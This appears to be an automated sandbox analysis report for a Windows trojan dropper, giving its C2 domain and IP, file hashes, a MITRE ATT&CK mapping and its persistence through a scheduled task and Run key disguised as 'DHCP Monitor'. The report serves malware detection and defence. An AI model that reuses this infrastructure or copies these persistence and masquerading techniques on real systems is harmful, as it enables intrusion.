        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        The matrix is listed here one tactic per line, with the techniques in the order of the original columns (a trailing digit string on a technique name is the count the report attached to it):

        Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
        Execution: Windows Management Instrumentation1, Scheduled Task/Job1, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
        Persistence: Scheduled Task/Job1, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
        Privilege Escalation: Access Token Manipulation1, Process Injection212, Scheduled Task/Job1, Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
        Defense Evasion: Disable or Modify Tools1, Deobfuscate/Decode Files or Information11, Obfuscated Files or Information2, Software Packing41, Masquerading2, Virtualization/Sandbox Evasion31, Access Token Manipulation1, Process Injection212, Hidden Files and Directories1
        Credential Access: Input Capture11, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
        Discovery: System Time Discovery1, File and Directory Discovery2, System Information Discovery25, Query Registry1, Security Software Discovery14, Process Discovery2, Virtualization/Sandbox Evasion31, Application Window Discovery1, System Network Connections Discovery
        Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
        Collection: Archive Collected Data11, Input Capture11, Clipboard Data1, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
        Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
        Command and Control: Encrypted Channel1, Non-Standard Port1, Remote Access Software1, Non-Application Layer Protocol1, Application Layer Protocol21, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
        Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
        Impact: System Shutdown/Reboot1, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction

        Behavior Graph

        Behavior Graph ID: 384149, Sample: bGf2H3tXGg.exe, Startdate: 08/04/2021, Architecture: WINDOWS, Score: 100
        Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 14 other signatures

        Process tree recovered from the graph (the graph image itself is not part of this text):

        bGf2H3tXGg.exe
            dropped: C:\Users\user\AppData\Local\...\xktfu.dll (PE32)
            signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Uses schtasks.exe or at.exe to add and modify task schedules; Contains functionality to prevent local Windows debugging
            bGf2H3tXGg.exe
                DNS/IP: backu4734.duckdns.org 40.71.91.165, ports 49708, 49710, 49711, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
                dropped: C:\Program Files (x86)\...\dhcpmon.exe (PE32); C:\Users\user\AppData\Roaming\...\run.dat (ISO-8859); C:\Users\user\AppData\Local\...\tmpDE28.tmp (XML); C:\...\dhcpmon.exe:Zone.Identifier (ASCII)
                signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                schtasks.exe
                    conhost.exe
                schtasks.exe
                    conhost.exe
        dhcpmon.exe
            dropped: C:\Users\user\AppData\Local\...\xktfu.dll (PE32)
            signatures: Maps a DLL or memory area into another process
            dhcpmon.exe
                dropped: C:\Users\user\AppData\...\dhcpmon.exe.log (ASCII)
        bGf2H3tXGg.exe
            dropped: C:\Users\user\AppData\Local\...\xktfu.dll (PE32)
            bGf2H3tXGg.exe
                dropped: C:\Users\user\AppData\...\bGf2H3tXGg.exe.log (ASCII)
        dhcpmon.exe
            dropped: C:\Users\user\AppData\Local\...\xktfu.dll (PE32)
            dhcpmon.exe

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        bGf2H3tXGg.exe | 51% | Virustotal |
        bGf2H3tXGg.exe | 16% | Metadefender |
        bGf2H3tXGg.exe | 69% | ReversingLabs | Win32.Trojan.Zenpak
        bGf2H3tXGg.exe | 100% | Joe Sandbox ML |

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll | 100% | Avira | HEUR/AGEN.1120893
        C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll | 100% | Avira | HEUR/AGEN.1120893
        C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll | 100% | Avira | HEUR/AGEN.1120893
        C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll | 100% | Avira | HEUR/AGEN.1120893
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Joe Sandbox ML |
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 51% | Virustotal |
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 16% | Metadefender |
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 69% | ReversingLabs | Win32.Trojan.Zenpak
        C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll | 19% | Virustotal |
        C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll | 14% | Metadefender |
        C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll | 41% | ReversingLabs | Win32.Trojan.InjectorX
        C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll | 19% | Virustotal |
        C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll | 14% | Metadefender |
        C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll | 41% | ReversingLabs | Win32.Trojan.InjectorX
        C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll | 19% | Virustotal |
        C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll | 14% | Metadefender |
        C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll | 41% | ReversingLabs | Win32.Trojan.InjectorX
        C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll | 19% | Virustotal |
        C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll | 14% | Metadefender |
        C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll | 41% | ReversingLabs | Win32.Trojan.InjectorX

        Unpacked PE Files

        Source | Detection | Scanner | Label
        3.2.bGf2H3tXGg.exe.4e70000.16.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        22.2.dhcpmon.exe.2430000.4.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        0.0.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        12.2.dhcpmon.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        22.1.dhcpmon.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        15.2.dhcpmon.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        15.2.dhcpmon.exe.10000000.5.unpack | 100% | Avira | HEUR/AGEN.1120893
        14.1.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        14.2.bGf2H3tXGg.exe.4a80000.10.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        12.0.dhcpmon.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        22.2.dhcpmon.exe.400000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        11.2.bGf2H3tXGg.exe.10000000.5.unpack | 100% | Avira | HEUR/AGEN.1120893
        11.2.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        11.0.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        17.0.dhcpmon.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        22.0.dhcpmon.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        0.2.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        12.2.dhcpmon.exe.10000000.5.unpack | 100% | Avira | HEUR/AGEN.1120893
        14.2.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        3.0.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        15.0.dhcpmon.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        0.2.bGf2H3tXGg.exe.10000000.5.unpack | 100% | Avira | HEUR/AGEN.1120893
        14.0.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        3.2.bGf2H3tXGg.exe.400000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        17.2.dhcpmon.exe.4a60000.10.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        3.1.bGf2H3tXGg.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        17.2.dhcpmon.exe.400000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

        Domains

        Source | Detection | Scanner | Label
        backu4734.duckdns.org | 1% | Virustotal |

        URLs

        Source | Detection | Scanner | Label
        backu4734.duckdns.org | 1% | Virustotal |
        backu4734.duckdns.org | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        backu4734.duckdns.org | 40.71.91.165 | true | true | | unknown

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        backu4734.duckdns.org | true | 1% Virustotal; Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://nsis.sf.net/NSIS_Error | bGf2H3tXGg.exe | false | | high
        http://nsis.sf.net/NSIS_ErrorError | bGf2H3tXGg.exe | false | | high

            Contacted IPs


            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            40.71.91.165 | backu4734.duckdns.org | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true

            General Information

            Joe Sandbox Version: 31.0.0 Emerald
            Analysis ID: 384149
            Start date: 08.04.2021
            Start time: 17:20:12
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 12m 38s
            Hypervisor based Inspection enabled: false
            Report type: full
            Sample file name: bGf2H3tXGg.exe
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed: 36
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal100.troj.evad.winEXE@18/24@16/1
            EGA Information: Failed
            HDC Information:
            • Successful, ratio: 13.5% (good quality ratio 12.3%)
            • Quality average: 75.8%
            • Quality standard deviation: 32.1%
            HCA Information:
            • Successful, ratio: 95%
            • Number of executed functions: 195
            • Number of non-executed functions: 71
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 168.61.161.212, 104.42.151.234, 23.54.113.53, 104.43.193.48, 13.64.90.137, 95.100.54.203, 20.82.209.183, 23.10.249.43, 23.10.249.26, 20.82.210.154, 20.54.26.129
            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.

            Simulations

            Behavior and APIs

            Time | Type | Description
            17:21:09 | API Interceptor | 838x Sleep call for process: bGf2H3tXGg.exe modified
            17:21:17 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\Desktop\bGf2H3tXGg.exe" s>$(Arg0)
            17:21:20 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
            17:21:21 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            17:21:30 | API Interceptor | 2x Sleep call for process: dhcpmon.exe modified

            Joe Sandbox View / Context

            IPs

            Match | Associated Sample Name / URL | Detection | Context
            40.71.91.165 | zr0evNqvkC.exe | malicious |

              Domains

              Match | Associated Sample Name / URL | Detection | Context
              backu4734.duckdns.org | zr0evNqvkC.exe | malicious | 40.71.91.165

              ASN

              Match | Associated Sample Name / URL | Detection | Context
              MICROSOFT-CORP-MSN-AS-BLOCKUS | securedmessage.htm | malicious | 52.239.152.74
              MICROSOFT-CORP-MSN-AS-BLOCKUS | Fattura di errore.exe | malicious | 104.209.133.4
              MICROSOFT-CORP-MSN-AS-BLOCKUS | PaymentAdvice.exe | malicious | 52.142.208.184
              MICROSOFT-CORP-MSN-AS-BLOCKUS | Signed pages of agreement copy.html | malicious | 52.97.232.194
              MICROSOFT-CORP-MSN-AS-BLOCKUS | zr0evNqvkC.exe | malicious | 40.71.91.165
              MICROSOFT-CORP-MSN-AS-BLOCKUS | uGSmoUM8Ex.exe | malicious | 52.169.150.217
              MICROSOFT-CORP-MSN-AS-BLOCKUS | New Orders.exe | malicious | 104.209.133.4
              MICROSOFT-CORP-MSN-AS-BLOCKUS | 6r3kQ7Ddkk.dll | malicious | 204.79.197.200
              MICROSOFT-CORP-MSN-AS-BLOCKUS | S9LQJCAiXi.exe | malicious | 40.122.131.23
              MICROSOFT-CORP-MSN-AS-BLOCKUS | sample.exe | malicious | 40.91.125.204
              MICROSOFT-CORP-MSN-AS-BLOCKUS | wzdu53.exe | malicious | 52.239.137.4
              MICROSOFT-CORP-MSN-AS-BLOCKUS | bank details.exe | malicious | 20.43.32.222
              MICROSOFT-CORP-MSN-AS-BLOCKUS | covid.exe | malicious | 168.62.194.64
              MICROSOFT-CORP-MSN-AS-BLOCKUS | 1drive.exe | malicious | 137.117.64.85
              MICROSOFT-CORP-MSN-AS-BLOCKUS | onbgX3WswF.exe | malicious | 52.142.208.184
              MICROSOFT-CORP-MSN-AS-BLOCKUS | scan-100218.docm | malicious | 51.145.124.145
              MICROSOFT-CORP-MSN-AS-BLOCKUS | Honeywell Home_v5.3.0_apkpure.com_20201208.apk | malicious | 52.232.209.85
              MICROSOFT-CORP-MSN-AS-BLOCKUS | bcex.apk.1 | malicious | 52.175.56.158
              MICROSOFT-CORP-MSN-AS-BLOCKUS | Transfer Form.exe | malicious | 20.43.32.222
              MICROSOFT-CORP-MSN-AS-BLOCKUS | PaymentInvoice.exe | malicious | 52.142.208.184

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Category:dropped
              Size (bytes):702907
              Entropy (8bit):5.903583773476114
              Encrypted:false
              SSDEEP:6144:69X0GFb/PdSrw+uHwUa5EIZUNf5F6p363E+r+voPIQLAoxQHHmAOZPBwf9:M0o1+Bvgs36pcoPIWPxUH1F
              MD5:F72A7FD231E50F9B43C3DAB470364846
              SHA1:1AC9F0876EC8F4B95FB0BBAE48C2A5B5D02ED411
              SHA-256:FB01157B437B00F34999FAA320BB55C8E44BDBB415E9A15503035BFE0E1D40D6
              SHA-512:C12BC1D2B74C2F209EADD40C02A56EE4B1A21287AB5B3391118F1FA12971C39DCBE2B8174B43A4D19281680247398140B223E0F00F03896B71AA8AA2352C084E
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Virustotal, Detection: 51%
              • Antivirus: Metadefender, Detection: 16%
              • Antivirus: ReversingLabs, Detection: 69%
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f..........H3............@..........................0............@.................................D.......................................................................................................................text...Wd.......f.................. ..`.rdata...............j..............@..@.data...8U...........~..............@....ndata...................................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................
              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview: [ZoneTransfer]....ZoneId=0
              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bGf2H3tXGg.exe.log
              Process:C:\Users\user\Desktop\bGf2H3tXGg.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.355304211458859
              Encrypted:false
              SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
              MD5:69206D3AF7D6EFD08F4B4726998856D3
              SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
              SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
              SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.355304211458859
              Encrypted:false
              SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
              MD5:69206D3AF7D6EFD08F4B4726998856D3
              SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
              SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
              SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
              C:\Users\user\AppData\Local\Temp\nejus0or2e4wbg8rhay
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:data
              Category:dropped
              Size (bytes):283136
              Entropy (8bit):7.999260184879652
              Encrypted:true
              SSDEEP:6144:3w+uHwUa5EIZUNf5F6p363E+r+voPIQLAoxQHHmAOZPBwfY:g+Bvgs36pcoPIWPxUH1g
              MD5:285906EFB24E6C8780A7F2E30BDBE72A
              SHA1:5CBAE1392002A6956635E15DB5147F85620F30E8
